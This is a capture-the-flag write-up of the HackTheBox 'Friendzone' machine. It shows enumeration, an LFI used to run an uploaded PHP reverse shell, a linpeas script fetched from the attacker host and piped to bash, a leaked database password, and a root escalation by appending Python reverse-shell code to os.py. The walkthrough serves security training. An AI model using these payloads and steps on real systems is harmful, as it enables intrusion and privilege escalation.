Friendzone
Introduction:
Friendzone need a good amount of enumeration for the ports and services as there are many services running and many application endpoints that seem interesting at first and can lead to rabbit holes. The privesc involves library hijacking for a python library that is left unprotected with incorrect permissions.
Recon
Nmap scan:
1eneloop@kinetic:.../hackthebox/friendzone/data$ sudo nmap -sS -sV -sC -T4 -O -oN nmap.friendzone.txt 10.10.10.123
2[sudo] password for eneloop:
3Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 13:23 EST
4Nmap scan report for 10.10.10.123
5Host is up (0.015s latency).
6Not shown: 993 closed ports
7PORT STATE SERVICE VERSION
821/tcp open ftp vsftpd 3.0.3
922/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
10| ssh-hostkey:
11| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
12| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
13|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
1453/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
15| dns-nsid:
16|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
1780/tcp open http Apache httpd 2.4.29 ((Ubuntu))
18|_http-server-header: Apache/2.4.29 (Ubuntu)
19|_http-title: Friend Zone Escape software
20139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
21443/tcp open ssl/http Apache httpd 2.4.29
22|_http-server-header: Apache/2.4.29 (Ubuntu)
23|_http-title: 404 Not Found
24| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
25| Not valid before: 2018-10-05T21:02:30
26|_Not valid after: 2018-11-04T21:02:30
27|_ssl-date: TLS randomness does not represent time
28| tls-alpn:
29|_ http/1.1
30445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
31No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
32TCP/IP fingerprint:
33OS:SCAN(V=7.91%E=4%D=2/28%OT=21%CT=1%CU=37630%PV=Y%DS=2%DC=I%G=Y%TM=603BDFA
34OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=106%TI=Z%II=I%TS=A)SEQ(SP=1
35OS:03%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
36OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
37OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
38OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T
39OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0%S
40OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
41OS:Q=)T7(R=N)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
42OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
43
44Network Distance: 2 hops
45Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
46
47Host script results:
48|_clock-skew: mean: -30m45s, deviation: 1h09m16s, median: 9m13s
49|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
50| smb-os-discovery:
51| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
52| Computer name: friendzone
53| NetBIOS computer name: FRIENDZONE\x00
54| Domain name: \x00
55| FQDN: friendzone
56|_ System time: 2021-02-28T20:32:48+02:00
57| smb-security-mode:
58| account_used: guest
59| authentication_level: user
60| challenge_response: supported
61|_ message_signing: disabled (dangerous, but default)
62| smb2-security-mode:
63| 2.02:
64|_ Message signing enabled but not required
65| smb2-time:
66| date: 2021-02-28T18:32:48
67|_ start_date: N/A
68
69OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
70Nmap done: 1 IP address (1 host up) scanned in 35.03 seconds
Notes:
- Please make note that the domain from the SSL cert is friendzone.red, add that to /etc/hosts.
- FTP service is running vsftpd 3.0.3
- A bind server running at ISC BIND 9.11.3-1ubuntu1.2
- Webserver uses Apache httpd 2.4.29
- SMB service is running - Samba smbd 4.7.6-Ubuntu
Enumeration
Enumerate the destination for the smb shares using enum4linux -
1eneloop@kinetic:.../hackthebox/friendzone/data$ enum4linux -S -d 10.10.10.123
2Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 28 20:20:19 2021
3
4 ==========================
5| Target Information |
6 ==========================
7Target ........... 10.10.10.123
8RID Range ........ 500-550,1000-1050
9Username ......... ''
10Password ......... ''
11Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
12
13
14 ====================================================
15| Enumerating Workgroup/Domain on 10.10.10.123 |
16 ====================================================
17[+] Got domain/workgroup name: WORKGROUP
18
19 =====================================
20| Session Check on 10.10.10.123 |
21 =====================================
22[+] Server 10.10.10.123 allows sessions using username '', password ''
23
24 ===========================================
25| Getting domain SID for 10.10.10.123 |
26 ===========================================
27Domain Name: WORKGROUP
28Domain Sid: (NULL SID)
29[+] Can't determine if host is part of domain or part of a workgroup
30
31 =========================================
32| Share Enumeration on 10.10.10.123 |
33 =========================================
34
35 Sharename Type Comment
36 --------- ---- -------
37 print$ Disk Printer Drivers
38 Files Disk FriendZone Samba Server Files /etc/Files
39 general Disk FriendZone Samba Server Files
40 Development Disk FriendZone Samba Server Files
41 IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
42SMB1 disabled -- no workgroup available
43
44[+] Attempting to map shares on 10.10.10.123
45//10.10.10.123/print$ Mapping: DENIED, Listing: N/A
46//10.10.10.123/Files Mapping: DENIED, Listing: N/A
47//10.10.10.123/general Mapping: OK, Listing: OK
48//10.10.10.123/Development Mapping: OK, Listing: OK
49//10.10.10.123/IPC$ [E] Can't understand response:
50NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
51enum4linux complete on Sun Feb 28 20:20:20 2021
Looks like we are able to read from a couple and write to one of the smb shares. Interestingly on one of the shares, you will find the creds but we dont know where to use those yet.
1eneloop@kinetic:.../hackthebox/friendzone/data$ smbclient //10.10.10.123/general
2Enter WORKGROUP\eneloop's password:
3Try "help" to get a list of possible commands.
4smb: \> ls
5 . D 0 Wed Jan 16 15:10:51 2019
6 .. D 0 Wed Jan 23 16:51:02 2019
7 creds.txt N 57 Tue Oct 9 19:52:42 2018
8
9 9221460 blocks of size 1024. 6419736 blocks available
10smb: \> get creds.txt
11getting file \creds.txt of size 57 as creds.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
12smb: \>
Lets validate that we can write to the Development share by uploading a empty file -
1eneloop@kinetic:.../hackthebox/friendzone/data$ smbclient //10.10.10.123/Development
2Enter WORKGROUP\eneloop's password:
3Try "help" to get a list of possible commands.
4smb: \> ls
5 . D 0 Sun Feb 28 13:43:05 2021
6 .. D 0 Wed Jan 23 16:51:02 2019
7
8 9221460 blocks of size 1024. 6419672 blocks available
9smb: \> put test.html
10putting file test.html as \test.html (0.3 kb/s) (average 0.3 kb/s)
11smb: \>
The friendzone.red takes us to a static website with a gif but when you look at the source for the page, it reveals js/js subdirectories.
1https://friendzone.red/js/js/
2
3REQUEST:
4
5GET /js/js/ HTTP/1.1
6Host: friendzone.red
7User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
8Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
9Accept-Language: en-US,en;q=0.5
10Accept-Encoding: gzip, deflate
11Connection: close
12Cookie: zonedman=justgotzoned
13Upgrade-Insecure-Requests: 1
14
15RESPONSE:
16HTTP/1.1 200 OK
17Date: Mon, 01 Mar 2021 02:20:13 GMT
18Server: Apache/2.4.29 (Ubuntu)
19Set-Cookie: zonedman=justgotzoned; expires=Mon, 01-Mar-2021 03:20:13 GMT; Max-Age=3600
20Vary: Accept-Encoding
21Content-Length: 198
22Connection: close
23Content-Type: text/html; charset=UTF-8
24
25<p>Testing some functions !</p><p>I'am trying not to break things !</p>cWQ2c3pjem9GbzE2MTQ1NjUyMTNOMm1kb0ZKS0p5<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->
Nothing interesting happening here, just looks like a rabbit hole. Lets move on -
Zone transfer
1eneloop@kinetic:.../hackthebox/friendzone/data$ dig axfr friendzone.red @10.10.10.123
2
3; <<>> DiG 9.16.8-Debian <<>> axfr friendzone.red @10.10.10.123
4;; global options: +cmd
5friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
6friendzone.red. 604800 IN AAAA ::1
7friendzone.red. 604800 IN NS localhost.
8friendzone.red. 604800 IN A 127.0.0.1
9administrator1.friendzone.red. 604800 IN A 127.0.0.1
10hr.friendzone.red. 604800 IN A 127.0.0.1
11uploads.friendzone.red. 604800 IN A 127.0.0.1
12friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
13;; Query time: 15 msec
14;; SERVER: 10.10.10.123#53(10.10.10.123)
15;; WHEN: Sun Feb 28 21:20:31 EST 2021
16;; XFR size: 8 records (messages 1, bytes 289)
visit https://administrator1.friendzone.red amd you will see a login page as shown below. Use the admin creds we found earlier to login and the page will direct you to visit another page - “Login Done ! visit /dashboard.php”
Also, if you visit https://uploads.friendzone.red/ you will be able to upload files.
Since the server can run php, lets create a reverse shell file and rename it to shell.png.php and upload. The server responds with a unix timestamp.
1Uploaded successfully !
21614652642
Now, we can go back to the dashboard page and pass those image name and timestamp parameter and see if we can get the server to run our php script which should send a reverse shell back to a listener running on our attack machine.
Start burp studio and reload the dashboard page where we can manipulate the requests.
php://filter/convert.base64-encode/resource=../uploads/upload
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=timestamp
1eneloop@kinetic:~$ echo -n PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo | base64 -d
2<?php
3$time_final = time() + 3600;
4echo "Final Access timestamp is $time_final";
5?>
1milind@lindex:~$ echo -n PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K | base64 -d
2<?php
3
4// not finished yet -- friendzone admin !
5
6if(isset($_POST["image"])){
7
8echo "Uploaded successfully !<br>";
9echo time()+3600;
10}else{
11
12echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";
13
14}
15
16?>
Exploitation
So, the upload script was useless as its really not doing anything however we have discovered a way to exploit the LFI and we have a way to upload files to the target machine over smb!
Lets upload a php shell and access it using the exploit -
Prepare shell
1eneloop@kinetic:.../tools/reverse-shell/php$ head -15 shell.php
2<?php
3set_time_limit (0);
4$VERSION = "1.0";
5$ip = '10.10.14.38'; // CHANGE THIS
6$port = 4455; // CHANGE THIS
7$chunk_size = 1400;
8$write_a = null;
9$error_a = null;
10$shell = 'uname -a; w; id; /bin/sh -i';
11$daemon = 0;
12$debug = 0;
13
14//
15// Daemonise ourself if possible to avoid zombies later
16//
17
Upload shell
1eneloop@kinetic:.../tools/reverse-shell/php$
2eneloop@kinetic:.../tools/reverse-shell/php$ smbclient //10.10.10.123/Development
3Enter WORKGROUP\eneloop's password:
4Try "help" to get a list of possible commands.
5smb: \> ls
6 . D 0 Wed Jan 16 15:03:49 2019
7 .. D 0 Wed Jan 23 16:51:02 2019
8
9 9221460 blocks of size 1024. 6418784 blocks available
10smb: \> put shell.php
11putting file shell.php as \shell.php (63.8 kb/s) (average 63.8 kb/s)
12smb: \> ls
13 . D 0 Tue Mar 2 21:05:06 2021
14 .. D 0 Wed Jan 23 16:51:02 2019
15 shell.php A 3460 Tue Mar 2 21:05:06 2021
16
17 9221460 blocks of size 1024. 6418780 blocks available
18smb: \>
Access shell
1eneloop@kinetic:.../tools/reverse-shell/php$ echo -n PD9waHAKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTAuMTAuMTQuMzgnOyAgLy8gQ0hBTkdFIFRISVMKJHBvcnQgPSA0NDU1OyAgICAgICAvLyBDSEFOR0UgVEhJUwokY2h1bmtfc2l6ZSA9IDE0MDA7CiR3cml0ZV9hID0gbnVsbDsKJGVycm9yX2EgPSBudWxsOwokc2hlbGwgPSAndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJzsKJGRhZW1vbiA9IDA7CiRkZWJ1ZyA9IDA7CgovLwovLyBEYWVtb25pc2Ugb3Vyc2VsZiBpZiBwb3NzaWJsZSB0byBhdm9pZCB6b21iaWVzIGxhdGVyCi8vCgovLyBwY250bF9mb3JrIGlzIGhhcmRseSBldmVyIGF2YWlsYWJsZSwgYnV0IHdpbGwgYWxsb3cgdXMgdG8gZGFlbW9uaXNlCi8vIG91ciBwaHAgcHJvY2VzcyBhbmQgYXZvaWQgem9tYmllcy4gIFdvcnRoIGEgdHJ5Li4uCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJLy8gRm9yayBhbmQgaGF2ZSB0aGUgcGFyZW50IHByb2Nlc3MgZXhpdAoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoKCS8vIE1ha2UgdGhlIGN1cnJlbnQgcHJvY2VzcyBhIHNlc3Npb24gbGVhZGVyCgkvLyBXaWxsIG9ubHkgc3VjY2VlZCBpZiB3ZSBmb3JrZWQKCWlmIChwb3NpeF9zZXRzaWQoKSA9PSAtMSkgewoJCXByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwoJCWV4aXQoMSk7Cgl9CgoJJGRhZW1vbiA9IDE7Cn0gZWxzZSB7CglwcmludGl0KCJXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiAgVGhpcyBpcyBxdWl0ZSBjb21tb24gYW5kIG5vdCBmYXRhbC4iKTsKfQoKLy8gQ2hhbmdlIHRvIGEgc2FmZSBkaXJlY3RvcnkKY2hkaXIoIi8iKTsKCi8vIFJlbW92ZSBhbnkgdW1hc2sgd2UgaW5oZXJpdGVkCnVtYXNrKDApOwoKLy8KLy8gRG8gdGhlIHJldmVyc2Ugc2hlbGwuLi4KLy8KCi8vIE9wZW4gcmV2ZXJzZSBjb25uZWN0aW9uCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0KCIkZXJyc3RyICgkZXJybm8pIik7CglleGl0KDEpOwp9CgovLyBTcGF3biBzaGVsbCBwcm9jZXNzCiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KAogICAwID0 | base64 -d | head -15
2base64: invalid input
3<?php
4set_time_limit (0);
5$VERSION = "1.0";
6$ip = '10.10.14.38'; // CHANGE THIS
7$port = 4455; // CHANGE THIS
8$chunk_size = 1400;
9$write_a = null;
10$error_a = null;
11$shell = 'uname -a; w; id; /bin/sh -i';
12$daemon = 0;
13$debug = 0;
14
15//
16// Daemonise ourself if possible to avoid zombies later
17//
18eneloop@kinetic:.../tools/reverse-shell/php$
Now visit - https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell
Start local listener
1eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 4455
2listening on [any] 4455 ...
3
4
5
6connect to [10.10.14.38] from (UNKNOWN) [10.10.10.123] 42356
7Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
8 04:07:57 up 26 min, 0 users, load average: 0.00, 0.02, 0.15
9USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
10uid=33(www-data) gid=33(www-data) groups=33(www-data)
11/bin/sh: 0: can't access tty; job control turned off
12$ $ $ $ who
13/bin/sh: 4: who: not found
14$ ls -l
15total 434900
16drwxr-xr-x 2 root root 4096 Oct 5 2018 bin
17drwxr-xr-x 3 root root 4096 Oct 5 2018 boot
18drwxr-xr-x 18 root root 3880 Mar 3 03:41 dev
19drwxr-xr-x 90 root root 4096 Jan 23 2019 etc
20drwxr-xr-x 3 root root 4096 Oct 5 2018 home
21lrwxrwxrwx 1 root root 33 Oct 5 2018 initrd.img -> boot/initrd.img-4.15.0-36-generic
22lrwxrwxrwx 1 root root 33 Oct 5 2018 initrd.img.old -> boot/initrd.img-4.15.0-36-generic
23drwxr-xr-x 18 root root 4096 Jan 23 2019 lib
24drwxr-xr-x 2 root root 4096 Oct 5 2018 lib64
25drwx------ 2 root root 16384 Oct 5 2018 lost+found
26drwxr-xr-x 2 root root 4096 Oct 5 2018 media
27drwxr-xr-x 2 root root 4096 Oct 5 2018 mnt
28drwxr-xr-x 3 root root 4096 Oct 6 2018 opt
29dr-xr-xr-x 100 root root 0 Mar 3 03:41 proc
30drwx------ 6 root root 4096 Jan 24 2019 root
31drwxr-xr-x 24 root root 640 Mar 3 03:41 run
32drwxr-xr-x 2 root root 4096 Jan 23 2019 sbin
33drwxr-xr-x 3 root root 4096 Oct 5 2018 srv
34-rw------- 1 root root 445255680 Oct 5 2018 swapfile
35dr-xr-xr-x 13 root root 0 Mar 3 03:41 sys
36drwxrwxrwt 2 root root 4096 Mar 3 03:41 tmp
37drwxr-xr-x 10 root root 4096 Oct 5 2018 usr
38drwxr-xr-x 12 root root 4096 Oct 6 2018 var
39lrwxrwxrwx 1 root root 30 Oct 5 2018 vmlinuz -> boot/vmlinuz-4.15.0-36-generic
40lrwxrwxrwx 1 root root 30 Oct 5 2018 vmlinuz.old -> boot/vmlinuz-4.15.0-36-generic
41$ hostname
42FriendZone
43$
Now we have user level access to the machine!
Post-exploit/PrivEsc
1eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 4455
2listening on [any] 4455 ...
3connect to [10.10.14.38] from (UNKNOWN) [10.10.10.123] 42394
4Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
5 04:09:52 up 28 min, 0 users, load average: 0.00, 0.01, 0.13
6USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
7uid=33(www-data) gid=33(www-data) groups=33(www-data)
8/bin/sh: 0: can't access tty; job control turned off
9$ python --version
10Python 2.7.15rc1
11$ ls -l /home/
12total 4
13drwxr-xr-x 5 friend friend 4096 Jan 24 2019 friend
14$ ls -l /home/friend/
15total 4
16-r--r--r-- 1 root root 33 Oct 6 2018 user.txt
17$
Linpeas
1$ curl http://10.10.14.38:8000/linpeas.sh| bash
2/bin/sh: 6: curl: not found
3$ cd /tmp
4$ wget http://10.10.14.38:8000/linpeas.sh
5--2021-03-03 04:12:22-- http://10.10.14.38:8000/linpeas.sh
6Connecting to 10.10.14.38:8000... connected.
7HTTP request sent, awaiting response... 200 OK
8Length: 313316 (306K) [text/x-sh]
9Saving to: 'linpeas.sh'
10
11 0K .......... .......... .......... .......... .......... 16% 1.85M 0s
12 50K .......... .......... .......... .......... .......... 32% 3.03M 0s
13 100K .......... .......... .......... .......... .......... 49% 4.78M 0s
14 150K .......... .......... .......... .......... .......... 65% 5.69M 0s
15 200K .......... .......... .......... .......... .......... 81% 5.91M 0s
16 250K .......... .......... .......... .......... .......... 98% 6.82M 0s
17 300K ..... 100% 7.05M=0.08s
18
192021-03-03 04:12:23 (3.85 MB/s) - 'linpeas.sh' saved [313316/313316]
20
21$ chmod 755 linpeas.sh
22$ ./linpeas.sh
23
24
25$ cd /var/www/
26$ ls
27admin
28friendzone
29friendzoneportal
30friendzoneportaladmin
31html
32mysql_data.conf
33uploads
34$ cat mysql_data.conf
35for development process this is the mysql creds for user friend
36
37db_user=friend
38
39db_pass=Agpyu12!0.213$
40
41db_name=FZ
Lets see if these credentials can be used to access the user “friend” -
1$ su friend
2su: must be run from a terminal
3$ python -c 'import pty; pty.spawn("/bin/bash");'
4www-data@FriendZone:/var/www$ su - friend
5su - friend
6Password: Agpyu12!0.213$
7
8friend@FriendZone:~$
Linpeas also reveals liberal permissions to ps.py and you can clearly see that it was tampered with. At this point, I wasnt sure how to exploit it as I could not find any script on obvious places or any scheduled jobs. But, I had a hunch that there has to be a python script that is calling the os module and it may lead to a privesc so I searched for all the python scripts in /root, /home, /usr (skipped /opt as it lots of python modules/apps installed and gave false positives)
1www-data@FriendZone:/var/www$ find / -name *.py -exec ls -l {} \; 2>/dev/null | grep -v '/usr/'
2<.py -exec ls -l {} \; 2>/dev/null | grep -v '/usr/'
3-rw-r--r-- 1 root root 155 Apr 1 2018 /etc/python3.6/sitecustomize.py
4-rwxr-xr-x 1 root root 155 Apr 16 2018 /etc/python2.7/sitecustomize.py
5-rwxr--r-- 1 root root 424 Jan 16 2019 /opt/server_admin/reporter.py
6www-data@FriendZone:/var/www$
The /opt/server_admin/reporter.py stool out so lets inspect further -
1friend@FriendZone:/opt/server_admin$ cat /opt/server_admin/reporter.py
2#!/usr/bin/python
3
4import os
5
6to_address = "[email protected]"
7from_address = "[email protected]"
8
9print "[+] Trying to send email to %s"%to_address
10
11#command = ''' mailsend -to [email protected] -from [email protected] -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
12
13#os.system(command)
14
15# I need to edit the script later
16# Sam ~ python developer
We can not manipulate the script but we sure can run it! Lets see if we can exploit this by appending a reverse shell at the bottom of the os library.
Library hijack
1friend@FriendZone:/opt/server_admin$ tail -30 /usr/lib/python2.7/os.py
2 (type, args) = sr.__reduce__()
3 return (_make_stat_result, args)
4
5try:
6 _copy_reg.pickle(stat_result, _pickle_stat_result, _make_stat_result)
7except NameError: # stat_result may not exist
8 pass
9
10def _make_statvfs_result(tup, dict):
11 return statvfs_result(tup, dict)
12
13def _pickle_statvfs_result(sr):
14 (type, args) = sr.__reduce__()
15 return (_make_statvfs_result, args)
16
17try:
18 _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
19 _make_statvfs_result)
20except NameError: # statvfs_result may not exist
21 pass
22
23
24import socket,subprocess
25s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
26s.connect(("10.10.14.38",5555))
27dup2(s.fileno(),0)
28dup2(s.fileno(),1)
29dup2(s.fileno(),2)
30import pty
31pty.spawn("/bin/bash")
32friend@FriendZone:/opt/server_admin$
Start listener and get root
1eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 5555
2listening on [any] 5555 ...
3connect to [10.10.14.38] from (UNKNOWN) [10.10.10.123] 33194
4root@FriendZone:~#
5root@FriendZone:~# ls
6ls
7certs root.txt
8root@FriendZone:~# cat root.txt
9cat root.txt
10b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXc7
11root@FriendZone:~#
Notes: